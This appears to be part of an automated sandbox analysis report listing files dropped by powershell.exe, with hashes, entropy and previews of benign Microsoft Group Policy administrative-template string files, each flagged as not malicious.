                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="HideSCABattery">Remove the battery meter</string>.. <string id="HideSCABattery_Help">This policy setting allows you to remove the battery meter from the system control area.....If you enable this policy setting, the battery meter is not displayed in the system notification area.....If you disable or do not configure this policy setting, the battery meter is displayed in the system notification area.</string>.. <string id="HideSCANetwork">Remove the networking icon</string>.. <string id="HideSCANetwor
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (495), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):19641
                                                                                          Entropy (8bit):4.878122311324998
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:HTFGnX5V42B4kc7w3p98BlDJQ2yhfOBV41eCFksM08wjblv:HTI5/b2KfSiNbh
                                                                                          MD5:F835CA2B1226B25600345F974B8706C4
                                                                                          SHA1:1B7BA254D3835BA025A8D68A8AC757019081AA09
                                                                                          SHA-256:E827705FA042FDD68C493B5F0159FE68B10F6B310C957A7F23F45F20DB14666E
                                                                                          SHA-512:183483215CAE2BA72A226AC50F6057D566A23E411C3BAABF0BBBBB6145046E85049F4B526CDA4591C145F6A92AB75567661885EDCECCE13B60EC0C00DD8E28FA
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_APP_COMPATIBILITY">Application Compatibility</string>.. <string id="TS_APP_COMPATIBILITY_Help">Controls application compatibility settings on an RD Session Host server</string>.. <string id="TS_TIME_ZONE">Allow time zone redirection</string>.. <string id="TS_TIME_ZONE_EXPLAIN">This policy setting allows you to specify whether the client computer redirects its time zone settings to the Remote Desktop Services session.....If you enable this policy setting, clients that are capable of time zone redir
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (638), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):127562
                                                                                          Entropy (8bit):4.836430182678649
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:9h4lfgUCtmBM22pFN8z0u753oq+I/jIqGUZRGUCFUvyP+YA4RhVjn:9hrtHrzGDiI/jIqGYRGQi3Vjn
                                                                                          MD5:3602B346F09097D79EAA8029915B67F9
                                                                                          SHA1:4BB802511857288C2ADA07AD532CB19E7CD5CD9D
                                                                                          SHA-256:FF74BE25815C0CA023FAD48EA35E6FA32566065485534D01842D617EB39F8ACE
                                                                                          SHA-512:77DDACF30B5D72A159A726FE040218F25D8E902C58CAE6D100F8B01255415C461C55A3645F643FB52D63B8079F0FCE6107CB96358EBBC7141A380D445C4B195A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_SUPPORTED_Windows8_or_ARM">At least Windows 8 or Windows RT</string>.. <string id="TS_SUPPORTED_Windows8_Server">At least Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_Windows8_Enterprise_AND_Server"> At least Windows 8 Enterprise or Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_ONLY_Windows7_OR_SERVER2K8R2">Windows 7 or Windows Server 2008 R2 (and their subsequent Service Packs) only</string>.. <string id="TS_SUPPORTED_ONLY_LEGACY">Windows Server 2008 R2, Windows Se
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2359
                                                                                          Entropy (8bit):4.864135463263543
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKlmesQ6SmH6Se6dSGH6crboeoO6S86Ss6dS6H6cr3DJUlptRdpEFV:LeD5pm5mZymDm8rboB8OwAr3DJUlfv2n
                                                                                          MD5:9DDDBE09EE87B401376670F58F52B8CB
                                                                                          SHA1:3E3D3EFB918717C290B5E1FAAA19721160449A05
                                                                                          SHA-256:36E567DB6F269F42865BC122835CBF10C7DE187AFF70BA93BA81C045486A134A
                                                                                          SHA-512:10A5388C2C26BCAB4E38A9507A958BA2A33A09184F003632C51C9405376E43CE27E96C3F7812C51766DD71855ACD81F1ACF4B096EA263F44C2B9623663C04738
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableThumbnails">Turn off the display of thumbnails and only display icons.</string>.. <string id="DisableThumbnails_Help">This policy setting allows you to configure how File Explorer displays thumbnail images or icons on the local computer.....File Explorer displays thumbnail images by default. ....If you enable this policy setting, File Explorer displays only icons and never displays thumbnail images.....If you disable or do not configure this policy setting, File Explorer displays only thumbnail images.<
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2055
                                                                                          Entropy (8bit):4.807218997990388
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKKU6oYecyziGWMlHqf+encFV:LeD5pm9HAd+FV
                                                                                          MD5:9562339E02D38BECE2D7D3C89EE47766
                                                                                          SHA1:1512A1230E2585B62FB78E1EE9E147FBCCF91D8F
                                                                                          SHA-256:A376991D45DD68CD83E2A76C75F136B75033FDE16297EC2868755268AF2869E2
                                                                                          SHA-512:531900F6AAADECA8DEF9C70F2E2D9A1A930237EE3E74CB1CF1172A2637DB340382E5108BD138F701CB533643EEA2514C2C43A1CC373B7F1EEB2FF103BCBF4AD5
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TouchInput">Touch Input</string>.. <string id="TouchInputOff">Turn off Tablet PC touch input</string>.. <string id="TouchInputOff_Help">Turn off Tablet PC touch input....Turns off touch input, which allows the user to interact with their computer using their finger.....If you enable this setting, the user will not be able to produce input with touch. They will not be able to use touch input or touch gestures such as tap and double tap, the touch pointer, and other touch-specific features.....If you disabl
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (658), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):43896
                                                                                          Entropy (8bit):4.667568456685799
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:FkIqBn46Y+xwhTjlMIbNzjWtqqnOTLTn8Gu/:Fkze+xwhTjlPWttSvnnA
                                                                                          MD5:5F55E2D434E9BE9D2AC4108C2AE42106
                                                                                          SHA1:6785C7EF4F183004F4F9CCF9D383DABF8914BFF3
                                                                                          SHA-256:D9459CCAD7106CC5A8665076C9D74C39D211D11A6F33870385528389826264D9
                                                                                          SHA-512:6109AEFDA8D656767F0A00C75F2241A454D85AA51B36338E1F5103A96BD32BB5B6571183132FD2468AE74A298623E7000A6F1C94F5760E55C92EB6DD01537BB0
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AddAdminGroupToRUP">Add the Administrators security group to roaming user profiles</string>.. <string id="AddAdminGroupToRUP_Help">This policy setting adds the Administrator security group to the roaming user profile share.....Once an administrator has configured a user's roaming profile, the profile will be created at the user's next login. The profile is created at the location that is specified by the administrator.....For the Windows XP Professional and Windows 2000 Professional operating systems, the defa
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1087), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):97809
                                                                                          Entropy (8bit):4.865980267514194
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yF3hamxu6iF2VflT2VfD7oaV6Z32VfDt2Kn+DZcZy:NYTNR96Zy
                                                                                          MD5:11CDF6A637203126A5F35982F599C1AF
                                                                                          SHA1:6E92BB3C55BAD050302EAFD9C7A722798B9FC0F1
                                                                                          SHA-256:CC9BCBDB2FBBD9B3A529CFEFAEE37231BE9D712840E0FBD456D8AF9947E15F14
                                                                                          SHA-512:AB39EA7CE5C379C90D4BAF6F4C506CDBDA17F29D75050CA10E713275EFAB609E0FBCD2B08E3D80E3F8EDCB410192B96C272789D10C1B71D9698B58BD75C6FE4A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of BitLocker Drive Encryption recovery information. This provides an administrative method of recovering data encrypted by BitLocker to prevent data loss due to lack of key information. This policy setting is only applicable to computers running Windows Server 2008 or Windows Vista.....If you enable this policy setting, BitLocker recovery information is automatically and silently backed up to AD
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (721), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):16499
                                                                                          Entropy (8bit):4.944041721958569
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:A/mnOQzg68GwhRsw6uHGtY2PQJyGizYTO2jF4TTt:JnORtuYTOmF4TTt
                                                                                          MD5:7FAF3A73C8DBAE90E511742BBB51AADD
                                                                                          SHA1:D651E3B70B5C8A6CE7FDCD92D15189CB6880A361
                                                                                          SHA-256:B62D8648EB65A947AE783F67A0E3F2276545DF1CD265CF4AA513DC53DF6882E0
                                                                                          SHA-512:74A1533992353ADFD8E33365AE91DC7CF914A488D5E406D537344FE6F3565AB669DF221082E96DE47E172A4916B695B27499E129BAA9C8FB9B51C9EB264196BD
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="W32TIME_CONFIG_EXPLAIN">This policy setting allows you to specify Clock discipline and General values for the Windows Time service (W32time) for domain controllers including RODCs.....If you enable this policy setting, you can specify the following Clock discipline, General and RODC parameters for this service.....If you disable or do not configure this policy setting, Windows Time service uses the defaults of each of the following parameters.....Several of the following values are scalar, which means that they on
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (583), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5728
                                                                                          Entropy (8bit):4.528195330790601
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmuOd2s+XGRFUv41c845cJ6RygNEfHZbWvK64kqo5UidD/PPTifE8h2WNOFV:EdOd2/XGbbqcSlNEf5CvWo5Ui9/n+MGW
                                                                                          MD5:7D5B3A4F151213CB0EFDACFA335A6AA3
                                                                                          SHA1:F36C9F3F58804077CE1AB9D41B29073D1E988752
                                                                                          SHA-256:5EC9152E44738D44848AB532D269EC0D51612FD60B5FA8A7A3D53DC0395164A2
                                                                                          SHA-512:C4DBFA582B75C32016FFE6AF8B5BEBFE2C9DBEB3A80BF1F8319CB1EAF76B043632E0E7A043457263EC41448A74C411920121EB194D04180E712C347F15F27EA7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Connection Manager Group Policy Settings</displayName>.. <description>Windows Connection Manager Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WCM_Category">Windows Connection Manager</string>.. <string id="WCM_BlockNonDomain">Prohibit connection to non-domain networks when connected to domain authenticated network</string>.. <string id="WCM_BlockNonDomain_Help">This policy setting prevents computers from connecting to both a domain based network and a non-domain based network at the same time... .. If this policy setting is enabled, the computer responds to automatic and manual networ
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (513), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3666
                                                                                          Entropy (8bit):4.76342138021097
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKMs4jm9y1YJWl5p0BsYlvPB9ZMKFdL5dbsEIqALJ/PUq1XWgV:LeD5pmYs4jkWlnCsKPB9ZRJHYV/PptV
                                                                                          MD5:3C7A58453A2A54C65A82137819FCBFA2
                                                                                          SHA1:635B1128546EA8A86DD984ADDE64BA1D0B8961A0
                                                                                          SHA-256:4A49D6F192FF5E859FE003DB2584049D5F54615F80E5B977156F7D51F4752105
                                                                                          SHA-512:DD3B7A0BE79E23F4B477080468B74BDA4D23730A2177DC4A092893718B2F0C2192AEB2885C60E0F2DF48AD0AA65E55535A61251325C1DFBB74844C867573139A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiDpsScenarioDataSizeLimitPolicy">Diagnostics: Configure scenario retention</string>.. <string id="WdiDpsScenarioDataSizeLimitPolicyExplain">This policy setting determines the data retention limit for Diagnostic Policy Service (DPS) scenario data.....If you enable this policy setting, you must enter the maximum size of scenario data that should be retained in megabytes. Detailed troubleshooting data related to scenarios will be retained until this limit is reached.....If you disable or do not configure this p
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7410
                                                                                          Entropy (8bit):4.5477372257913125
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmIA4ik0bcMuEB4odMuQ0AuwsurKK4GA1TunDzDsZwuE7MteWQPyqyjV:EQkdMuEWCMuesurKKHKTuAwuE7MIWKxA
                                                                                          MD5:77C2A2EB749EBCA17124B632612CE191
                                                                                          SHA1:3B7F2E4594DB1D354755184C0127825F6A81E7D5
                                                                                          SHA-256:058509712BF20A49CC276BDF4AB6B0CCDC3550501DA0F2C4529E234E9AAE6068
                                                                                          SHA-512:6FC63B4998C6E746D82F5680FB67BE2CEADC227EFFE5A07DFF1E94E69A1711AD207EA4481DF25E722D57BBBCFD14F4C395C086D06E3071D1237099C8518AB313
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NotificationsCategory">Notifications</string>.. <string id="NoTileNotification">Turn off tile notifications</string>.. <string id="NoTileNotificationExplain">.. This policy setting turns off tile notifications..... If you enable this policy setting, applications and system features will not be able to update their tiles and tile badges in the Start screen..... If you disable or do not configure this policy setting, tile and badge notifications are enabled and can be turned off b
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1085
                                                                                          Entropy (8bit):4.9989682223802285
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffWinCal">Turn off Windows Calendar</string>.. <string id="TurnOffWinCal_Explain">Windows Calendar is a feature that allows users to manage appointments and tasks by creating personal calendars, publishing them, and subscribing to other users calendars.....If you enable this setting, Windows Calendar will be turned off.....If you disable or do not configure this setting, Windows Calendar will be turned on.....The default is for Windows Calendar to be turned on.</string>.. <string id="WinCal">Windows
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2477
                                                                                          Entropy (8bit):4.814838125716894
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNamedPipeShutdownPolicyDescription">Turn off legacy remote shutdown interface</string>.. <string id="DisableNamedPipeShutdownPolicyDescription_Help">This policy setting controls the legacy remote shutdown interface (named pipe). The named pipe remote shutdown interface is needed in order to shutdown this system from a remote Windows XP or Windows Server 2003 system.....If you enable this policy setting, the system does not create the named pipe remote shutdown interface.....If you disable or do not conf
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8978
                                                                                          Entropy (8bit):4.691590472306916
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisplayLastLogonInfoDescription">Display information about previous logons during user logon</string>.. <string id="DisplayLastLogonInfoDescription_Help">This policy setting controls whether or not the system displays information about previous logons and logon failures to the user.....For local user accounts and domain user accounts in domains of at least a Windows Server 2008 functional level, if you enable this setting, a message appears after the user logs on that displays the date and time of the last suc
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7341
                                                                                          Entropy (8bit):5.050859952546844
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by operating system components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsVistaOrServer2008Only">Windows Server 2008 and Windows Vista</string>.. <string id="SUPPORTED_AllowWebPrinting">Windows 2000 or later, running IIS. Not supported on Windows Server 2003.</string>.. <string id="SUPPORTED_IE6SP1">At least Internet Explorer 6 Service Pack 1</string>.. <string id="SUPPORTED_Win2k">At least Windows 2000</string>.. <s
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.0665762842091135
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WAU">Add features to Windows 8.1</string>.. <string id="WAU_Help">Contains settings to control the behavior of the Add features to Windows 8.1 wizard.</string>.. <string id="DisableWAU">Prevent the wizard from running.</string>.. <string id="DisableWAU_Help">By default, Add features to Windows 8.1 is available for all administrators. ....If you enable this policy setting, the wizard will not run.....If you disable this policy setting or set it to Not Configured, the wizard will run.</string>.. </s
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3483
                                                                                          Entropy (8bit):4.819976484985464
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Backup</displayName>.. <description>Windows Backup</description>.. <resources>.. <stringTable>.. <string id="AllowOnlySystemBackup">Allow only system backup</string>.. <string id="AllowOnlySystemBackupExplain">This policy setting allows you to manage whether backups of only system volumes is allowed or both OS and data volumes can be backed up.....If you enable this policy setting, machine administrator/backup operator can backup only volumes hosting OS components and no data only volumes can be backed up.If you disable or do not configure this policy setting, backups can include both system or data volumes.</string>.. <string i
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1427
                                                                                          Entropy (8bit):4.84683359240417
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProhibitChangingInstalledProfileList">Prohibit installing or uninstalling color profiles</string>.. <string id="ProhibitChangingInstalledProfileListExplain">This policy setting affects the ability of users to install or uninstall color profiles.....If you enable this policy setting, users cannot install new color profiles or uninstall previously installed color profiles.....If you disable or do not configure this policy setting, all users can install new color profiles. Standard users can uninstall color profi
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3410
                                                                                          Entropy (8bit):5.029780460475183
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WCN_Category">Windows Connect Now</string>.. <string id="WCN_DisableWcnUi">Prohibit access of the Windows Connect Now wizards</string>.. <string id="WCN_DisableWcnUi_Help">This policy setting prohibits access to Windows Connect Now (WCN) wizards. ....If you enable this policy setting, the wizards are turned off and users have no access to any of the wizard tasks. All the configuration related tasks, including "Set up a wireless router or access point" and "Add a wireless device" are disabled. ....If you d
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):75437
                                                                                          Entropy (8bit):4.739020696864297
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AntiSpyware">Windows Defender</string>.. <string id="Exclusions">Exclusions</string>.. <string id="NetworkRealtimeInspection">Network Inspection System</string>.. <string id="NetworkRealtimeInspection_Exclusions">Network Inspection System Exclusions</string>.. <string id="Quarantine">Quarantine</string>.. <string id="RealtimeProtection">Real-time Protection</string>.. <string id="Remediation">Remediation</string>.. <string id="Reporting">Reporting</string>.. <string id="Scan">Scan</string>.. <string id="SignatureUpdate">Signature Updates</string>..
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (989), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):57954
                                                                                          Entropy (8bit):4.692320082638433
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ABCDOnly">Restrict A, B, C and D drives only</string>.. <string id="ABConly">Restrict A, B and C drives only</string>.. <string id="ABOnly">Restrict A and B drives only</string>.. <string id="ALLDrives">Restrict all drives</string>.. <string id="ClassicShell">Turn on Classic Shell</string>.. <string id="ClassicShell_Help">This setting allows an administrator to revert specific Windows Shell behavior to classic Shell behavior.....If you enable this setting, users cannot configure their syste
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
